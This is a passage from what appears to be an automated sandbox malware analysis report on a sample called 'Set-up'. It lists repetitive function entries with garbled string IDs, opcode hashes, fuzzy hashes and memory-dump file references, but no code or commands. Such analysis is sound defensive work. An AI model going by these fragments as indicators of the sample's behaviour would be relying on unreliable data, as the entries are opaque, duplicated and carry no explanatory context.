                                                                                                                                                                                                                                                              • String ID: !@$'$,$J$m$m$r
                                                                                                                                                                                                                                                              • API String ID: 0-3940219623
                                                                                                                                                                                                                                                              • Opcode ID: 3808121648b5745d85930b8dc04967832c50add5c78604a7439569329b7225cc
                                                                                                                                                                                                                                                              • Instruction ID: ceab2f07879f00c3568a15680d9b8f7c3475906db73294ebc09983b3385afc9f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3808121648b5745d85930b8dc04967832c50add5c78604a7439569329b7225cc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E612C2B162C3418FD3219F68C48436EBBE2ABC9314F58896DE4D9873D6D7B58845CB83
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $$$$.$.$K$K$M
                                                                                                                                                                                                                                                              • API String ID: 0-2801665918
                                                                                                                                                                                                                                                              • Opcode ID: 382ecb02990192fde52e48b6788cc99637d93d05787e913cd85d105fb445fa57
                                                                                                                                                                                                                                                              • Instruction ID: f9d64c97c333ab6c09f821b8a00bf0274aeb50eb358b3481071cd1af0eba14b3
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 382ecb02990192fde52e48b6788cc99637d93d05787e913cd85d105fb445fa57
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CCE1497151D3C18EC3758B7894957EBBFE06FEA214F0849AED5D8CA383C57482858B27
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: (]'_$/Q,S$0A2C$8E?G$8UVW$;Y;[
                                                                                                                                                                                                                                                              • API String ID: 0-2954296438
                                                                                                                                                                                                                                                              • Opcode ID: 5b40631e9ae9a6f0f842efd048358e16b24f329c257bd7d566fbea2f38130da3
                                                                                                                                                                                                                                                              • Instruction ID: 95ac8629e6fa9316118a911f9d9a0029cf29ac580eb5ba39ef0b2b21d59ed2c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b40631e9ae9a6f0f842efd048358e16b24f329c257bd7d566fbea2f38130da3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5AA126726183228BD724CF25C89136BB7F1FFC5714F098A2DE8C59B694E7788905C786
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 23<=$Gslm$p_]$tu$x<
                                                                                                                                                                                                                                                              • API String ID: 0-335005638
                                                                                                                                                                                                                                                              • Opcode ID: 5b6d2b75d24bda1c36f3ab2243b57368c6c1388ad7a0a30a2306fc743f40bf18
                                                                                                                                                                                                                                                              • Instruction ID: 0587e874f70a1be404e60dfd7a3dce360b244b485120f7bc64086cf21c5b2ee6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b6d2b75d24bda1c36f3ab2243b57368c6c1388ad7a0a30a2306fc743f40bf18
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C062EE726183518FD324CF68C88576BBBE5EBC9314F18C92DE9988B294D778D905CB82
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: )$)$IDAT$IEND$IHDR
                                                                                                                                                                                                                                                              • API String ID: 0-3469842109
                                                                                                                                                                                                                                                              • Opcode ID: b663f34e84d833c92c8b2ed695d46316ddfb8b0631141d0b82b5d3c6b5b91bae
                                                                                                                                                                                                                                                              • Instruction ID: c09bcbad520b55cd38adb2dd3aaf078bc5d25ca197038c6641f23650503cc134
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b663f34e84d833c92c8b2ed695d46316ddfb8b0631141d0b82b5d3c6b5b91bae
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A80203B06183818FD710CF68CC94B6A7BE1FBE6300F05856DE9858B395D3B9D919CB92
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: $$30$LM$|w
                                                                                                                                                                                                                                                              • API String ID: 0-1872391088
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 2x$u}$wrq|$}t
                                                                                                                                                                                                                                                              • API String ID: 0-2818379622
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: @~$@~$f$x~
                                                                                                                                                                                                                                                              • API String ID: 0-660555072
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: &@^c$&@^c$8+2|$;))5
                                                                                                                                                                                                                                                              • API String ID: 0-1423208211
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: &@^c$&@^c$8+2|$;))5
                                                                                                                                                                                                                                                              • API String ID: 0-1423208211
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: &@^c$&@^c$8+2|$;))5
                                                                                                                                                                                                                                                              • API String ID: 0-1423208211
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: S"(w$S"(w$f
                                                                                                                                                                                                                                                              • API String ID: 0-891790955
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 30$BIVB$BIVB
                                                                                                                                                                                                                                                              • API String ID: 0-3166255827
                                                                                                                                                                                                                                                              • Opcode ID: beb35e4e253d84354e3855f7aec3ba4b43497494191f6676442f556d80eec32c
                                                                                                                                                                                                                                                              • Instruction ID: e51d0e6c63a46c1bae875c57fad6e9accaeec76af1796a27ac16bc637851fff0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: beb35e4e253d84354e3855f7aec3ba4b43497494191f6676442f556d80eec32c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1020FB2A1C7809FE7049F69C81176FBBE2BBD1304F18895CE1D54B351DB7A85098B87
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: x$RP$VT
                                                                                                                                                                                                                                                              • API String ID: 0-4095361847
                                                                                                                                                                                                                                                              • Opcode ID: 20fe291115fa31f00eed7b7ef80a1fd34bad3fd3d8a394758a1a316c5088f32c
                                                                                                                                                                                                                                                              • Instruction ID: 429a78fcea155a56b47943ccd767802c7c687b97d11501e845ec1983314dcd09
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 20fe291115fa31f00eed7b7ef80a1fd34bad3fd3d8a394758a1a316c5088f32c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AD1567665C3918BD325CF6885A076FBBD2ABD1204F18C92DE8D55B389D774880A8B83
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: /p$_016$b
                                                                                                                                                                                                                                                              • API String ID: 0-1245655123
                                                                                                                                                                                                                                                              • Opcode ID: bc1866f05e2ab70399ae028df1b42b19cbee60d4e9c37cb7798280a8d782f55e
                                                                                                                                                                                                                                                              • Instruction ID: 5a104eb8c599a8c13708b28488b6d7c98074f16039651a92cf7b78ae42e01965
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc1866f05e2ab70399ae028df1b42b19cbee60d4e9c37cb7798280a8d782f55e
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C9A113715183228BC328CF54C8A036BB7F2FFC5714F198A1DE8C96B694E7798949CB46
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 6$XQ$ak
                                                                                                                                                                                                                                                              • API String ID: 0-1480714512
                                                                                                                                                                                                                                                              • Opcode ID: 339673bfe2ce95ac9e27341b7ef150e128cd3ab914f3a40c8f4fafd3e9b51a9d
                                                                                                                                                                                                                                                              • Instruction ID: 4d36ad29261d46e822f420a578f0637f4b611597fda1048ed19836f1e8b86eca
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 339673bfe2ce95ac9e27341b7ef150e128cd3ab914f3a40c8f4fafd3e9b51a9d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9761F7719247118FC724CF68C99066BB7F5FF86310F494A2CE495CB6A8E7B8E544CB81
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: N*I$$[.
                                                                                                                                                                                                                                                              • API String ID: 0-328004532
                                                                                                                                                                                                                                                              • Opcode ID: 97cd9afdbec01a71f2002f68d059e3fb774be6e64a5fdae1a98def6de46a1bb9
                                                                                                                                                                                                                                                              • Instruction ID: de58f69cca2f4e08e944df2231b19ee88f6de0c191076ecf18170ace0ec16cd8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97cd9afdbec01a71f2002f68d059e3fb774be6e64a5fdae1a98def6de46a1bb9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C0128221508FD2CED336C63C880834ABFD16B67224F098B9DD1F64BBE2C765A506C766
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: -$.
                                                                                                                                                                                                                                                              • API String ID: 0-3807043784
                                                                                                                                                                                                                                                              • Opcode ID: e8bfc1189610befe8a93f0d4bb85ecc5bed45ebc053b23a2a7b0190d71e66edb
                                                                                                                                                                                                                                                              • Instruction ID: 814a372c243c4f18ef8903854665f01150ff7b29ab26ce93e85949ebd7f61061
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8bfc1189610befe8a93f0d4bb85ecc5bed45ebc053b23a2a7b0190d71e66edb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58A18E32E282624BC3148E69C8606A6FBE39BD5220F19C75AD8D5973DDEB34DD81C7C1
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: .$23,-
                                                                                                                                                                                                                                                              • API String ID: 0-3099856921
                                                                                                                                                                                                                                                              • Opcode ID: c4867b4046678fd1a4e703d2f88df1e83f5430be957c335267209f1f2253d90f
                                                                                                                                                                                                                                                              • Instruction ID: 203ea8e8a63b05666a6a2899de84bbed246aa7f54c5d3dedddb853f49cefa4bf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4867b4046678fd1a4e703d2f88df1e83f5430be957c335267209f1f2253d90f
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4A128726583614FCB16CE68C89036EBBE2ABC5220F18C67DE8E5CB395C774D906C791
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 1>$I_
                                                                                                                                                                                                                                                              • API String ID: 0-216584966
                                                                                                                                                                                                                                                              • Opcode ID: ed80e920f18ba18a6f30b9943c8592f4b06ac950735bfd4f2cb628694719f301
                                                                                                                                                                                                                                                              • Instruction ID: d8a804634f921f452b1579eea8f89bc090cf91071662803b6d468e6801db54cf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed80e920f18ba18a6f30b9943c8592f4b06ac950735bfd4f2cb628694719f301
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D371FEB52283018BD715CF65C8A2B6BB7F1EF86714F08896CE4868B799E778C504CB16
Strings
Memory Dump Source
• Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: LEM5$LEM5
                                                                                                                                                                                                                                                              • API String ID: 0-1309638290
                                                                                                                                                                                                                                                              • Opcode ID: ae2b7b58291b8b9bb849e1cdbe116f3c1708aa5fdfe71bb9fae912ecea2bb5cb
                                                                                                                                                                                                                                                              • Instruction ID: 037aefd9c2ca13c6cfda8b67331fe09c926c17a102634df5b69d412e0ac72406
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae2b7b58291b8b9bb849e1cdbe116f3c1708aa5fdfe71bb9fae912ecea2bb5cb
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D617D326283618FD318CF68C65036EB7D2EBC6324F59872EE4A58B7E8DB748445C742
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: F<RK$_
                                                                                                                                                                                                                                                              • API String ID: 0-467998110
                                                                                                                                                                                                                                                              • Opcode ID: 66396c7c332bf48bb2264303380fe41f9e377862ea000026689b410395731e89
                                                                                                                                                                                                                                                              • Instruction ID: fe3a4e01bdd1d947a8d75319a54dc31d147a1357cbcfe3f5f71aac939a3565ab
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 66396c7c332bf48bb2264303380fe41f9e377862ea000026689b410395731e89
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3A5159B155C3915FE7158F64C89036FFBE1DB92304F08992CE1C1A7292C3BAC8098B56
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: #D#J$KH
                                                                                                                                                                                                                                                              • API String ID: 0-3522619608
                                                                                                                                                                                                                                                              • Opcode ID: bc61465ca6767d1913d66107e6f48a9c1a4a9bde877ecb8d0dc20e4c9fafb32a
                                                                                                                                                                                                                                                              • Instruction ID: 058dcb14974d8b1bc582b60fafce4d89b6e30da52b84fbe3be70553c43ec051c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc61465ca6767d1913d66107e6f48a9c1a4a9bde877ecb8d0dc20e4c9fafb32a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A12105A1A283028BD3119F68C851777B7F2FF92324F059A58E091CB298F378C544C796
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: ol$|r
                                                                                                                                                                                                                                                              • API String ID: 0-94947588
                                                                                                                                                                                                                                                              • Opcode ID: e28595ae0fd4debb60f6ff698f082b533d39de77fd323586d00179b6eaaa31e9
                                                                                                                                                                                                                                                              • Instruction ID: 5401b58f5ae33fb7af6686b7ab9cb50cdb9ee09da8c8014fb868c02edac8b19f
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e28595ae0fd4debb60f6ff698f082b533d39de77fd323586d00179b6eaaa31e9
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E541D2726193C18BD374CF65C8553EBBBE2AFD6304F29886DD4C94B396CA350002CB46
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: "#$WQ
                                                                                                                                                                                                                                                              • API String ID: 0-1672720038
                                                                                                                                                                                                                                                              • Opcode ID: 7cac1a28be8fa5d6dfca3d492581fae87361e06edf2860a9bbf2b3101fd31c2d
                                                                                                                                                                                                                                                              • Instruction ID: 4d288f757b3ce2808e3987878f2362afbfbc6631dd9b040dea665a4ab0e196b4
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7cac1a28be8fa5d6dfca3d492581fae87361e06edf2860a9bbf2b3101fd31c2d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE1103346183408FE308CF359C916AFBBA2ABD3314F18CA2CA1D957386C7349406CB4A
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: RF\=
                                                                                                                                                                                                                                                              • API String ID: 0-2050078478
                                                                                                                                                                                                                                                              • Opcode ID: 96419abeb1382cdb758b81842613a285b725111bd766334065efb40fb4028f94
                                                                                                                                                                                                                                                              • Instruction ID: 97b19930017baf9d67aa67a07a24d217ee31f7c9184d769417d26c7bee146c33
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96419abeb1382cdb758b81842613a285b725111bd766334065efb40fb4028f94
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6E157715283218BD714CF24C89036BB7F2FFC6314F19991CE8D19B299E7BA940ACB52
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: B
                                                                                                                                                                                                                                                              • API String ID: 0-1016091060
                                                                                                                                                                                                                                                              • Opcode ID: 9673bd7c600ea52ff7bcd139fed49ebbff0850bd7c6266ea79e35c4c73a9e10a
                                                                                                                                                                                                                                                              • Instruction ID: 80c50d58ea1b570e9beaeef3b1c8f6a4eae66713831c59fda151cf6f8e7f3941
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9673bd7c600ea52ff7bcd139fed49ebbff0850bd7c6266ea79e35c4c73a9e10a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F5E104B25183108BD724DF58C8517ABB7F2EFC5314F098A5CD8D59B3A4E7B89804CB92
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: 8
                                                                                                                                                                                                                                                              • API String ID: 0-406019892
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1978363313.0000000002210000.00000040.00001000.00020000.00000000.sdmp, Offset: 02210000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2210000_Set-up.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                                                                              • API String ID: 0-123907689
